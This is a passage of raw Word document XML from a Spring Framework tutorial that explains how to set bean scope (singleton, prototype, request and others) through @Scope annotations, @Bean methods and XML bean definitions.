            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4603A0AB" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>@Bean</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> in </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>@Configuration</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1437AB7F" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>When you need to manually configure bean</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w14:paraId="32934DDB" w14:textId="77777777" w:rsidTr="008E5E16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B0DD770" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>XML Config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D0EBCDB" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&lt;bean&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tag in XML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="596FD6E1" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Legacy code or specific config setups</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="581E9569" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008E5E16">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="55C03943">
          <v:rect id="_x0000_i2088" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9183EA" w14:textId="4347DCAD" w:rsidR="00D40DC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00D40DC5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="431" w:name="_Toc196307911"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to add scope in bean configuration?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="431"/>
    </w:p>
    <w:p w14:paraId="039342FA" w14:textId="3C5EDC19" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="002D12CB">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ean </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> determines the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lifecycle and visibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a bean — basically how many instances of the bean Spring will create and where they’re shared.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437D25DF" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="00DF5D94">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mon scopes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3322A691" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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gleton (default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535CD840" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ototype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE0E558" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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quest (Web apps only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCB2F7E" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ssion (Web apps only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E9DC67" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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pplication (Web apps only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B916FC" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DF5D9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30961C6">
          <v:rect id="_x0000_i2089" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB3AAE5" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="00DF5D94">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1. Using Annotations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AFFC04" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="00DF5D94">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With @Scope Annotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BAFE88" w14:textId="77777777" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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355387"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC36AD7" w14:textId="77777777" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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355387"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Scop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rototyp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r "singleton", "request", etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE6A63B" w14:textId="77777777" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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355387"/>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Bea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783F409" w14:textId="77777777" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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3553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Bean logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E69D3D" w14:textId="0C74A1CC" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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355387"/>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7618CAF1" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="00DF5D9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 also use @Scope on @Service, @Repository, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302E7677" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="0006418F">
      <w:pPr>
        <w:ind w:firstLine="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you're using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>web scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (request, session, etc.), add @Scope with proxyMode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CD5352" w14:textId="77777777" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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061022"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B021DD2" w14:textId="77777777" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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061022"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Scope</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valu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reque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roxyMod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copedProxyMod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ARGET_CLASS</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3EE17F" w14:textId="77777777" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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061022"/>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RequestScopedBea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65DA7AC" w14:textId="77777777" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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06102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coped to a single HTTP request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A22EC7A" w14:textId="5C699CCE" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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061022"/>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760B2DB4" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DF5D9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9F89343">
          <v:rect id="_x0000_i2090" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E5451C" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="00DF5D94">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2. Using Java Configuration (@Bean)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FA6C4F" w14:textId="77777777" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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10151"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001A1827" w14:textId="77777777" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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10151"/>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ppConfig</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41D309E" w14:textId="77777777" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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10151"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDEC376" w14:textId="77777777" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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1015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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FD7891" w14:textId="77777777" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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10151"/>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006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Scop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rototype"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01073F8D" w14:textId="77777777" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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1015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Bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> myBea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E1DB4DB" w14:textId="77777777" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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1015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Bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AFE49E" w14:textId="77777777" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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1015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533FE8B" w14:textId="0E3F40CA" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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10151"/>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68CE905E" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DF5D9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036633C">
          <v:rect id="_x0000_i2091" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57855770" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="00DF5D94">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3. Using XML Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD8E36D" w14:textId="6309AD5F" w:rsidR="0006418F" w:rsidRPr="00CE4B95"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2200656"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;bean</w:t>
      </w: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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"myBean"</w:t>
      </w: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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"com.example.MyBean"</w:t>
      </w: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scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"prototype"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A3A9D3" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DF5D9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189ABDF">
          <v:rect id="_x0000_i2092" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB6ABCF" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="00DF5D94">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Bean Scopes in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7"/>
        <w:gridCol w:w="4006"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w14:paraId="1ABDD496" w14:textId="77777777" w:rsidTr="00DF5D94">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40EA3231" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="0006418F">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cope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="739448E8" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="0006418F">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DF5D94" w:rsidRPr="00CE4B95" w14:paraId="5ABFC97D" w14:textId="77777777" w:rsidTr="00DF5D94">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F912BF8" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="00DF5D9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gleton</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F50D31C" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="00DF5D9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e instance per Spring container (default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w14:paraId="5AF37961" w14:textId="77777777" w:rsidTr="00DF5D94">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AA1A50B" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="00DF5D9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ototype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7645484C" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="00DF5D9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ew instance every time it's requested</w:t>
            </w:r>
